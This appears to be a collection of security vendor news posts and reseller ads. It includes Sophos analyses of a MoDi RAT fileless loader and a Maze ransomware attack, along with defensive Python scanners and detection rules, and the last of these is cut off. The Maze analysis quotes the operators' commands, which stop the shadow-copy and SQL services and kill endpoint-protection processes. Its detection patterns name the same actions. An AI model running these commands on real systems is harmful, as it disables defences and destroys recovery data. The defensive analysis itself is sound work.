XG Firewall is Nutanix AHV and Nutanix Flow Ready – Sophos News

Sophos XG Firewall has joined the robust and growing Nutanix ecosystem that is enabling global enterprises to converge and virtualize their IT infrastructure.

XG Firewall is now Nutanix AHV and Nutanix Flow ready to provide protection for networked applications and traffic in Nutanix virtualized environments. XG Firewall delivers the same kind of easy deployment, management and performance that Nutanix AHV is known for.

Nutanix is the industry leader in hyperconverged infrastructure (HCI) that makes the underlying datacenter and cloud infrastructure invisible, abstracting and elevating it to enable businesses to focus on their applications and services. The Nutanix AHV hypervisor converges private, public, and distributed clouds, bringing simplicity and agility to infrastructure management.

XG Firewall v18 with the new Xstream Architecture running on Nutanix AHV provides deeper visibility into applications, network activity, and threats – able to stop even previously unseen attacks.

Nutanix Flow is a software defined network policy engine built into AHV that provides easy and granular policy-driven application micro-segmentation.

XG Firewall has been validated to provide two modes of operation within Nutanix AHV infrastructure:

  1. XG Firewall can provide standard NGFW protection on Nutanix AHV, just as it does on any other physical, virtual, cloud, or hybrid network.
  2. In addition, non-IP bridge mode in XG can be used within the network as part of Nutanix Flow’s micro-segmentation to transparently redirect VM traffic through a virtual XG Firewall running in bridge mode on every AHV host to protect east-west traffic.

XG Firewall can protect traffic entering and leaving the Nutanix AHV infrastructure while also securing traffic moving within the Nutanix Flow software defined network, taking advantage of the granular redirection capabilities of Nutanix Flow micro-segmentation that ensures security protection policies are optimized for individual applications.

XG Firewall’s full suite of protection capabilities will help secure Nutanix applications and network traffic flows, including TLS inspection, intrusion prevention, application control, web protection and filtering, and zero-day threat protection with sandboxing and threat intelligence.

Visit Sophos.com/Firewall to learn more about XG Firewall products.

Net Universe offers all Sophos devices and subscriptions, as well as consultancy services, with worldwide delivery services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Sophos to be included in the 2020 MITRE Engenuity ATT&CK®️ Evaluations for Enterprise – Sophos News

We are pleased to announce that Sophos is participating in the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation with Sophos Intercept X.

The evaluation tests the detection capabilities of endpoint protection and endpoint detection and response (EDR) solutions. The 2020 test utilizes techniques common to the Carbanak and FIN7 threat groups.

MITRE Engenuity states:

These groups carry a firm reputation of utilizing innovative tradecraft. Efficient espionage and stealth are at the forefront of their strategy, as they often rely heavily on scripting, obfuscation, “hiding in plain sight,” and fully exploiting the users behind the machine while pillaging an environment. They also leverage a unique spectrum of operational utilities, spanning both sophisticated malware as well as legitimate administration tools capable of interacting with various platforms (Windows and Linux, including point-of-sale specific technologies).

Carbanak is known for targeting banks, and FIN7 is known for targeting the U.S. retail, restaurant, and hospitality sectors.

This year an optional Protections scenario is also available as part of testing, which Sophos has also chosen to participate in. MITRE Engenuity expects the results and methodology to be available early in 2021.

For more information on the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation, read MITRE Engenuity’s blog and testing overview.


Email-delivered MoDi RAT attack pastes PowerShell commands – Sophos News

SophosLabs researchers Fraser Howard and Andrew O’Donnell stumbled upon an unusual reflective loader attack method last month while hunting through threat telemetry. The attack chain started with a malicious email message that contained some hostile VB scripting code, and concluded by delivering a commodity remote access Trojan named MoDi RAT.

These kinds of detections often lead to interesting, divergent attacks, which is what the detection teams are looking for. Diving down the rabbit hole, Howard and O’Donnell discovered a few intriguing twists to the convoluted attack, which included a Scheduled Task that started a Visual Basic Script file that, in turn, launched PowerShell and then literally pasted the text of the commands into the PowerShell window, rather than passing the command string as a parameter.

But let’s not get ahead of ourselves. Here is Howard’s root cause analysis (RCA) of the attack chain.

AMSI vs. MoDi RAT

The attack analysis pivoted on some of the data collected from Sophos endpoint products using Microsoft’s Antimalware Scan Interface (AMSI). The root cause of the attack triggered our telemetry: a malicious script, delivered (most likely) via spam. In the example below, the user’s browser (Edge, highlighted in red below) started the attack chain, which you can see in this snippet of the threat case.

The attack begins when a recipient of the malspam opens the message attachment. The Visual Basic Script in the message attachment connects to a remote site, which is the entry point into a series of HTTP 302 redirects that eventually lead to a .Zip archive, hosted in OneDrive cloud storage, that contains an encoded VBS (VBE) file. 

With the VBE file in hand, we set about reproducing the entire attack to get a complete picture, right through to the payload.

The initial VBScript writes out a second VBS file to the filesystem, and inserts three new entries into the Windows Registry that contain binary data, written out as 8-digit binary numbers. It then launches a system utility to create a new Scheduled Task that, at a predetermined time in the future, launches the VBS script.

When the Scheduled Task runs, it uses wscript.exe to launch the VBS. The VBS code launches PowerShell and then runs code that takes data from the VBS and inserts it into the system’s clipboard, from where it programmatically “pastes” the commands into the PowerShell window using the VBS SendKeys command.

This neat little trick for delivering the PowerShell commands seems designed to evade detection by keeping the executed commands under the radar, rather than attracting attention by spawning an instance of PowerShell with interesting command-line parameters that might trigger all sorts of security product alerts. From this point on, the attack is fileless.

In the next step, PowerShell extracts a .NET decoder executable from one of the Registry blobs (labeled Entreur in the Registry) that the VBE had created earlier, and reflectively loads it by injecting it into a system process.

The decoder executable, in turn, extracts the .NET injector and payload blobs (labeled in the Registry as inj and Myfile, respectively) from the Registry. Then the injector loads the payload (injecting into the host application, msbuild.exe).
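As an added defensive example (not SophosLabs’ code), the scanner below looks for the staging pattern described above: registry values whose data is a run of 8-digit binary numbers that decodes to a PE image. The value name Entreur comes from the writeup; the blob contents are a constructed stub, and on a real host the values would be read with winreg instead of the embedded sample.

```python
import re
from typing import Dict, List, Optional

# A value that is nothing but 8-digit binary groups, e.g. "01001101 01011010 ...".
# Groups may be space-separated or run together; any other character disqualifies the value.
BINARY_GROUPS = re.compile(r"^(?:[01]{8}\s*)+$")


def decode_binary_groups(text: str) -> Optional[bytes]:
    """Turn a string of 8-digit binary numbers back into bytes; None if the text isn't one."""
    stripped = text.strip()
    if not BINARY_GROUPS.fullmatch(stripped):
        return None
    digits = re.sub(r"\s+", "", stripped)
    return bytes(int(digits[i:i + 8], 2) for i in range(0, len(digits), 8))


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE sanity check: 'MZ' DOS magic and a 'PE\\0\\0' signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_encoded_executables(values: Dict[str, str]) -> List[str]:
    """Names of registry values whose data is a binary-digit-encoded PE image."""
    hits = []
    for name, data in values.items():
        blob = decode_binary_groups(data)
        if blob is not None and looks_like_pe(blob):
            hits.append(name)
    return hits


# --- Constructed test data (not real malware): a 64-byte DOS header plus a bare PE signature ---
def build_fake_pe() -> bytes:
    dos_header = bytearray(0x40)
    dos_header[0:2] = b"MZ"
    dos_header[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew points right after the header
    return bytes(dos_header) + b"PE\x00\x00" + b"\x00" * 20


def encode_binary_groups(data: bytes) -> str:
    """Encode bytes the way the writeup describes: one 8-digit binary number per byte."""
    return " ".join(format(b, "08b") for b in data)


SAMPLE_VALUES = {
    "Entreur": encode_binary_groups(build_fake_pe()),        # decoder blob, named as in the writeup
    "Notes": encode_binary_groups(b"just some ascii text"),  # binary-encoded but not a PE
    "InstallPath": r"C:\Program Files\Example",              # ordinary string value
}

if __name__ == "__main__":
    print(find_encoded_executables(SAMPLE_VALUES))  # ['Entreur']
```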

Notably, the initial Zip payload name (“Timbres-electroniques”) and several other strings, including the Entreur Registry key, consisted of French words. Some of the targets of these attacks were French firms.

The diagram below summarizes all this and illustrates the key components of the attack chain.

The three .NET executable layers (decoder, injector, and payload) do not touch the disk, but we proactively blocked the attack based on our recognition of the technique the attackers employ to deliver the payload filelessly.

Despite already proactively blocking this attack, as a result of our further investigation we were able to enhance existing detections to provide additional resilience against similar attacks we might see in the future.

Why you should upgrade from older Windows

Microsoft’s AMSI framework that helps us intercept and neutralize these kinds of attacks is only available on certain recent flavors of Windows (Windows 10, Windows Server 2016 and Windows Server 2019). If there’s one single reason why users of older versions of Windows should upgrade, it’s this: AMSI protection is crucial to helping us defend against many of today’s attacks, particularly those that use fileless techniques.

This attack typifies how most of the fileless attacks that we see work. AMSI provides the capability for Sophos to proactively protect customers against a range of similar attacks, and the telemetry we’re able to get lets us dive into these rabbit holes so we can identify and enhance our protections more effectively.

Sophos endpoint products will detect the components of this attack as AMSI/Reflect-D, Troj/VBSInj-D, and AMSI/ModiRat-A.

Indicators of compromise

IoCs relating to this investigation have been posted to the SophosLabs Github.


School District Secures Distance Learning for 18,000+ Students With FortiEDR

Customer Perspectives

As school districts across the United States booted up for distance learning, endpoint security became a top priority. Many educational organizations found themselves a target of cybercriminals exploiting the recent pandemic through social engineering attacks—especially now that students and staff have access to the district’s network from their own devices, in their own homes. 

Even prior to the COVID-19 pandemic, the number of easily exploited endpoint devices connected to networks was growing rapidly. This increased even more so with the shift to remote work and learning. The issue is exacerbated by the growing sophistication of cyber threats and by the pandemic-related attacks launched by cybercriminals leveraging fear, uncertainty and doubt (FUD) in social engineering attacks.

One U.S. school district found itself procuring 20,000 more laptops to enable its 18,000 students and 2,200 staff members to learn and work from home. With growing concerns around ransomware and phishing—particularly spearphishing—and an incumbent solution that was not meeting their expectations, the school district began looking for a new vendor. An ideal solution would provide remote web filtering, endpoint protection, detection, response and remote remediation. 

As an existing Fortinet customer, this district already had a number of solutions across the Fortinet Security Fabric in place, including FortiGate Next-Generation Firewalls (NGFWs), FortiAnalyzer, FortiManager, FortiSandbox, FortiAuthenticator, and FortiClient. Because of this, the district had already seen how Fortinet’s broad, integrated, and automated product portfolio enabled increased visibility, centralized management, and seamless protection across the entire digital attack surface—including remote locations. Both their knowledge of the extensive Fortinet portfolio and the existing trusted partnership between the two led the school district to begin a proof of concept (PoC) of Fortinet’s Endpoint Detection and Response solution, FortiEDR.

FortiEDR delivers real-time, automated threat protection, detection, and response for endpoints—both pre- and post-infection. The key capabilities of FortiEDR include discovery and risk mitigation, next-generation antivirus (NGAV), behavior-based detection, real-time blocking, automated incident response, forensic investigation, threat hunting, and virtual patching capabilities. FortiEDR delivers all of this in a form factor with a lightweight footprint that is easy to deploy, even on devices with limited system resources. And as part of the Security Fabric, FortiEDR could seamlessly integrate with the existing solutions the school district had in place, ensuring centralized management and complete visibility and control across their digital attack surface.

After seeing a variety of ransomware samples being tested and automatically dealt with in real-time during the PoC, this school district determined that FortiEDR met, and even exceeded each of their expectations and was exactly what they were looking for to secure remote access and improve endpoint security among students and staff. 

By adopting FortiEDR, this school district saw the following benefits: 

  • Secure remote access and remote web filtering: FortiEDR enables students and staff alike to gain access to the school district’s resources without compromising the security of the network by ensuring consistent remote web filtering. 
  • Enhanced endpoint visibility and resilience: FortiEDR not only gives the school district complete visibility over all endpoint devices connected to the network, but also ensures that each of those devices is resilient against potential threats. 
  • Improved threat protection: With growing concern around ransomware and targeted spearphishing emails, this school district was relieved to adopt an endpoint security solution that would mitigate those risks and protect students and staff as they work remotely. 

With FortiEDR, this school district was well-equipped to secure endpoints during distance learning and well into the future.  

Learn more about how FortiEDR has the unique ability to defuse and disarm a threat in real-time, pre- and post-infection.

As Fortinet partners, Net Universe offers all Fortinet devices and subscriptions with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/fortinet.
You can visit our Shop Online

Blocking a $15 million Maze ransomware attack – Sophos News

Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.

The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – had they succeeded, this would have been one of the most expensive ransomware payments to date.

Background: Ransomware partners in crime

Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.

The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.

This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.

For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.

Days 1-3: The attack begins

Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a ‘beach head’ in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).

On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.

Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.

The attackers’ attention then turned to the exfiltration of data.

They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRar and 7zip, they started compressing folders located on it.

These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.

The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.

Days 4-5: The calm before the storm

For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.

Day 6: The first ransomware attack is launched

The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.

This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:

  • C:\ProgramData\enc6.exe
  • C:\ProgramData\enc.exe
  • C:\ProgramData\network.dll

Three scheduled tasks were created to execute the ransomware:

 Name                               Command
 Windows Update Security Patches    C:\ProgramData\enc6.exe
 Windows Update Security Patches 5  C:\ProgramData\enc.exe
 Windows Update Security            regsvr32.exe /i c:\programdata\network.dll

Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.

Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$ 15 million.

Day 7: The MTR team gets to work

Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.

Day 8: Investigation and neutralization continue

Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.

Day 9: The second attack

The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.

However, this time they copied a file called license.exe to C:\ProgramData:

This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”:

The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.
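An added triage example, not Sophos’ or the MTR team’s code, that applies the indicators from the first and second attempts above to a constructed list of task definitions: a task action launched from the root of ProgramData, regsvr32 /i loading a DLL from there, and an update-sounding task name whose action is not a vendor binary. The task names and paths are the ones reported above; the benign GoogleUpdate task is a constructed control.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ScheduledTask:
    name: str
    command: str  # the task's action as it appears in the task definition


# User-writable roots that vendor update tasks never launch their binaries from.
WRITABLE_ROOTS = ("c:\\programdata\\", "%programdata%\\", "c:\\users\\public\\")
VENDOR_DIRS = ("c:\\windows\\", "c:\\program files")
UPDATE_WORDS = re.compile(r"windows update|security update|security patches|chrome", re.I)
REGSVR_INSTALL = re.compile(r"\bregsvr32(?:\.exe)?\b.*\s/i\b", re.I)


def _normalize(command: str) -> str:
    return command.strip().strip('"').lower()


def _launches_from_root(cmd: str) -> bool:
    """True when a referenced file sits directly in a writable root (no vendor subfolder)."""
    for root in WRITABLE_ROOTS:
        idx = cmd.find(root)
        if idx == -1:
            continue
        first_token = re.split(r'[\s"]', cmd[idx + len(root):], maxsplit=1)[0]
        if first_token and "\\" not in first_token:
            return True
    return False


def triage_task(task: ScheduledTask) -> List[str]:
    """Reasons this task matches the staging pattern; an empty list means nothing matched."""
    cmd = _normalize(task.command)
    reasons = []
    if _launches_from_root(cmd):
        reasons.append("payload launched from root of a user-writable folder")
    if REGSVR_INSTALL.search(cmd) and any(root in cmd for root in WRITABLE_ROOTS):
        reasons.append("regsvr32 /i loads a DLL from a user-writable path")
    if UPDATE_WORDS.search(task.name) and not cmd.startswith(VENDOR_DIRS):
        reasons.append("update-style name but action is not a vendor binary")
    return reasons


def triage_all(tasks: List[ScheduledTask]) -> Dict[str, List[str]]:
    return {t.name: triage_task(t) for t in tasks}


# Constructed sample: task names and actions from the incident above plus one benign vendor task.
SAMPLE_TASKS = [
    ScheduledTask("Windows Update Security Patches", r"C:\ProgramData\enc6.exe"),
    ScheduledTask("Windows Update Security Patches 5", r"C:\ProgramData\enc.exe"),
    ScheduledTask("Windows Update Security", r"regsvr32.exe /i c:\programdata\network.dll"),
    ScheduledTask("Google Chrome Security Update", r"C:\ProgramData\license.exe"),
    ScheduledTask("GoogleUpdateTaskMachineUA",
                  r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua'),
]

if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_TASKS).items():
        print(f"{name}: {'; '.join(reasons) or 'clean'}")
```

On a live system the same function can be fed the output of schtasks /query /xml or Get-ScheduledTask, one ScheduledTask per action.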

Day 9: Third time lucky?

Just a few hours after the second attempt, the attackers tried again.

By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.

In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).

Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.

The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.

Defeating adversaries in human-led attacks

This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round.  It also demonstrates how, to minimize likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

What can defenders do?

The most important things an IT security team can do are to reduce the attack surface, implement strong security software (including specialist anti-ransomware protection), educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.

Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.

MITRE ATT&CK Mapping

The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs). It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.

Initial Access

  • T1078.002 – Valid Accounts: Domain Accounts
  • T1133 – External Remote Services

Execution

  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  • T1047 – Windows Management Instrumentation
  • T1053.005 – Scheduled Task/Job: Scheduled Task

Defense Evasion

  • T1564.006 – Hide Artifacts: Run Virtual Instance

Credential Access

Discovery

  • T1016 – System Network Configuration Discovery

Lateral Movement

  • T1021.001 – Remote Services: Remote Desktop Protocol
  • T1021.002 – Remote Services: SMB/Windows Admin Shares

Command & Control

  • T1071.001 – Application Layer Protocol: Web Protocols

Exfiltration

  • T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage

Impact

  • T1486 – Data Encrypted for Impact

Sophos Managed Threat Response and threat hunting

For more information on the Sophos MTR service visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.


Introducing Sophos Techvids, a large library of helpful support videos – Sophos News

We’re excited to announce the launch of our new Sophos Techvids video hub!

This new platform features our extensive video library (90+ and counting!) of how-to, configuration, and troubleshooting videos, and improves the viewing experience by introducing new and interactive features such as in-video surveys and easy-to-use navigational elements.

Check out: https://techvids.sophos.com

Interactive in-video features

Feedback surveys: In-video prompts and surveys provide an easy way to share your feedback to help us improve future videos.

Interactive video navigation: Available on most of our current videos, the navigational top-bar is interactive. Click to skip directly to the section of the video you want to view.

Not sure where to start? Here are our most popular videos:

Check out the entire collection at https://techvids.sophos.com today!


How NIST and eIDAS revisions are shaping the future of e-identification

Net Universe offers all Yubikeys with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/yubikey.
You can visit our Shop Online

 

Sophos is named a Leader in IDC’s mobile threat management report – Sophos News

We are proud to announce that Sophos has been recognized as a Leader in the IDC MarketScape: Worldwide Mobile Threat Management Software 2020 Vendor Assessment.

The report provides an overview of mobile threat management (MTM) security solutions, also referred to as mobile threat defense (MTD) solutions – an increasingly important security market segment in today’s world, where an increasingly mobile workforce is doing more work on mobile devices than ever.

We believe this placement for Sophos Intercept X for Mobile is a testament to the strength of the Intercept X deep learning engine used across Sophos’ endpoint security range of products. Together with the flexibility of strong management and security capabilities in Sophos Central, the cloud-based management platform for all Sophos products lets organizations manage their mobile, endpoint, server, and network security in the same console.

Furthermore, we believe that this placement is due to Intercept X for Mobile’s seamless integration with the powerful endpoint management capabilities of Sophos Mobile, giving organizations the best of both worlds for mobile threat management (MTM) and unified endpoint management (UEM).

According to the report, “Sophos’ combination of MTM and UEM products is rare among MTM vendors and unique among vendors in this study.”

Intercept X for Mobile is available for Android, iOS, and Chrome OS and offers users world-class device, network, and app security, protecting against the latest mobile threats such as ransomware, network attacks, and exploits. According to the report, “This combination [of MTM and UEM] gives Sophos a strong advantage in situations where enterprises want a single vendor for both mobile device management and security enforcement.”

Sophos Intercept X for Mobile also integrates with a broad range of third-party platforms, including Microsoft Intune and other top UEM vendors – providing organizations with a flexible solution to protect against mobile threats within their unique existing security infrastructures.

To learn more about Intercept X for Mobile, head over to Sophos.com or download and try it for yourself at Google Play or the App Store.


Maze attackers adopt Ragnar Locker virtual machine technique – Sophos News

While conducting an investigation into an attack in July in which the attackers repeatedly attempted to infect computers with Maze ransomware, analysts with Sophos’ Managed Threat Response (MTR) discovered that the attackers had adopted a technique pioneered by the threat actors behind Ragnar Locker earlier this year, in which the ransomware payload was distributed inside of a virtual machine (VM).

In the Maze incident, the threat actors distributed the file-encrypting payload of the ransomware on the VM’s virtual hard drive (a VirtualBox virtual disk image (.vdi) file), which was delivered inside a Windows .msi installer file more than 700MB in size. The attackers also bundled a stripped-down, 11-year-old copy of the VirtualBox hypervisor inside the .msi file, which runs the VM as a “headless” device, with no user-facing interface.

The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. A threat hunt through telemetry data initially indicated the attackers may have been present on the attack target’s network for at least three days prior to the attack beginning in earnest, but subsequent analysis revealed that the attackers had penetrated the network at least six days prior to delivering the ransomware payload.

The investigation also turned up several installer scripts that revealed the attackers’ tactics, and found that the attackers had spent days preparing to launch the ransomware by building lists of IP addresses inside the target’s network, using one of the target’s domain controller servers, and exfiltrating data to cloud storage provider Mega.nz.

The threat actors initially demanded a $15 million ransom from the target of the attack. The target did not pay the ransom.

How the attack transpired

Subsequent analysis by the MTR team revealed that the attackers orchestrated the attack using batch files, and made multiple attempts to maliciously encrypt machines on the network. The first iteration of ransomware payloads was all copied to the root of the %programdata% folder, using the filenames enc.exe, enc6.exe, and network.dll. The attackers then created scheduled tasks that would launch the ransomware, with names based on variants of Windows Update Security or Windows Update Security Patches.

The initial attack did not produce the desired result. The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender’s Real-Time Monitoring feature.

The attackers then, once again, executed a command that would create a scheduled task on each computer they had copied the license.exe payload to, this time named Google Chrome Security Update, and set it up to run once at midnight (in the local time zone of the infected computers).

Sophos analysts started to see detections indicating that the malware was triggering the CryptoGuard behavioral protections of Intercept X. These detections showed that the ransomware payloads were being caught and quarantined on machines protected by Sophos endpoint products before they could cause harm. In this case, CryptoGuard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive.

So the attackers decided to try a more radical approach for their third attempt.

Weaponized virtual machine

The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. Inside of the .msi was an installer for both the 32-bit and 64-bit versions of VirtualBox 3.0.4. This version dates back to 2009 and is still branded with its then-publisher’s name, Sun Microsystems.

The .msi also contains a 1.9GB (uncompressed) virtual disk named micro.vdi, which itself contains a bootable partition of Windows 7 SP1, and a file named micro.xml that contains configuration information for the virtual hard drive and session.

The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload.

The DLL file has a different, internal name for itself.

The preload.bat file (shown below) modifies the computer name of the virtual machine, generating a series of random numbers to use as the name, and joins the virtual machine to the network domain of the victim organization’s network using a WMI command-line function.

The virtual machine was, apparently, configured in advance by someone who knew something about the victim’s network, because its configuration file (“micro.xml”) maps two drive letters that are used as shared network drives in this particular organization, presumably so it can encrypt the files on those shares as well as on the local machine. It also creates a folder at C:\SDRSMLINK and shares this folder with the rest of the network.

At some point (it’s unclear when and how, exactly, it accomplished this), the malware also writes out a file named startup_vrun.bat. We found this file in c:\users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Startup, which means it’s a persistence mechanism that relies on the computer rebooting before the attackers launch the malware.

The script copies the same three files found on the root of the VM disk (the vrun.exe and payload DLL binaries, and the preload.bat batch script) to other disks, then issues a command to shut down the computer immediately. When someone powers the computer on again, the script executes vrun.exe.

The C:\SDRSMLINK folder location, created when the .msi file first runs, acts as a clearinghouse for specific folders the malware wants to track. It’s full of symbolic links (symlinks, similar to Windows shortcuts) to folders on the local hard drive.

The Ragnar Locker connection

The technique used in the third attack is completely different from those used before by the threat actors behind Maze, but the investigators recognized it immediately, because the team who responded to this Maze attack is the same team that responded to the Ragnar Locker ransomware attack, where the technique was first seen.

In an earlier attack, Ragnar Locker also deployed a virtual machine in an attempt to bypass protection measures

In Sophos’ earlier reporting about Ragnar Locker, we wrote that “Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.” MITRE has subsequently added this technique to its ATT&CK framework.

The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. This significantly increased the size of the virtual disk, but also added some functionality that wasn’t available in the Ragnar Locker version. The threat actors bundled a VirtualBox installer and the weaponized VM virtual drive inside a file named pikujuwusewa.msi. The attackers then used a batch script called starter.bat to launch the attack from within the VM.

The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware payload on the attacker’s ‘builder’ machine. But the cost in terms of size is significant: the Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack—all just to conceal one 494 KB ransomware executable from detection.

Component                   Ragnar Locker            Maze
MSI installer               122 MB, OracleVA.msi     733 MB, pikujuwusewa.msi
Virtual Disk Image (VDI)    282 MB, micro.vdi        1.90 GB, micro.vdi
Ransomware binary in VDI    49 KB, vrun.exe          494 KB, payload

The attackers also executed the following commands on the host computer during the Maze attack:

cmd /c msiexec /qn /i \\<machine-hosting-malware>\frs\pikujuwusewa.msi

This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive.

C:\Windows\System32\cmd.exe /C sc stop vss

They stop the Volume Shadow Copy service (the ransomware itself also includes a command to delete existing shadow copies).

C:\Windows\System32\cmd.exe /C sc stop sql

They halt SQL services to ensure that they can encrypt any databases.

C:\Windows\System32\cmd.exe /C taskkill /F /IM SavService.exe

They attempt to stop Sophos endpoint protection services (which fails).

C:\Windows\System32\cmd.exe /C sc start VBoxDRV

Finally, they start the VirtualBox service and launch the VM.
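As an added example (not code from the Sophos write-up), the Python below runs simple detection rules over constructed process-creation records modelled on the host commands above and on the masquerading scheduled task from the second attempt, and flags a host that shows the share-hosted MSI install followed by the VBoxDRV service start. The host names, the file server name, the C:\temp path and the schtasks command line are assumptions; only the command patterns come from the write-up.

```python
import re

# Constructed sample process-creation records (host, command line). They mirror the
# commands quoted in the write-up; they are not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", r'schtasks /create /tn "Google Chrome Security Update" /tr C:\temp\license.exe /sc once /st 00:00'),
    ("ws01", r"cmd /c msiexec /qn /i \\fileserver\frs\pikujuwusewa.msi"),
    ("ws01", r"C:\Windows\System32\cmd.exe /C sc stop vss"),
    ("ws01", r"C:\Windows\System32\cmd.exe /C sc stop sql"),
    ("ws01", r"C:\Windows\System32\cmd.exe /C taskkill /F /IM SavService.exe"),
    ("ws01", r"C:\Windows\System32\cmd.exe /C sc start VBoxDRV"),
    ("ws02", r"C:\Windows\System32\cmd.exe /C sc query vss"),
    ("ws02", r"msiexec /i C:\Users\alice\Downloads\7z1900-x64.msi"),
]

# Detection rules: (name, case-insensitive regex over the command line).
RULES = [
    # Quiet (/qn) MSI install pulled from a UNC share (\\host\share\...), any flag order.
    ("msi_quiet_install_from_share",
     re.compile(r"msiexec\b(?=.*\s/qn\b)(?=.*\s/i\s+\\\\[^\\\s]+\\)", re.I)),
    # Scheduled task using the Chrome-update name seen in the second attempt.
    ("masquerading_scheduled_task",
     re.compile(r'schtasks\b.*/create\b.*/tn\s+"?Google Chrome Security Update', re.I)),
    ("vss_service_stopped", re.compile(r"\bsc(\.exe)?\s+stop\s+vss\b", re.I)),
    ("sql_service_stopped", re.compile(r"\bsc(\.exe)?\s+stop\s+sql\b", re.I)),
    ("av_process_kill_attempt", re.compile(r"\btaskkill\b.*/IM\s+SavService\.exe", re.I)),
    ("vbox_driver_started", re.compile(r"\bsc(\.exe)?\s+start\s+VBoxDRV\b", re.I)),
]

# The launch chain from the write-up: MSI from a share, then the VirtualBox driver starts.
VM_CHAIN = {"msi_quiet_install_from_share", "vbox_driver_started"}

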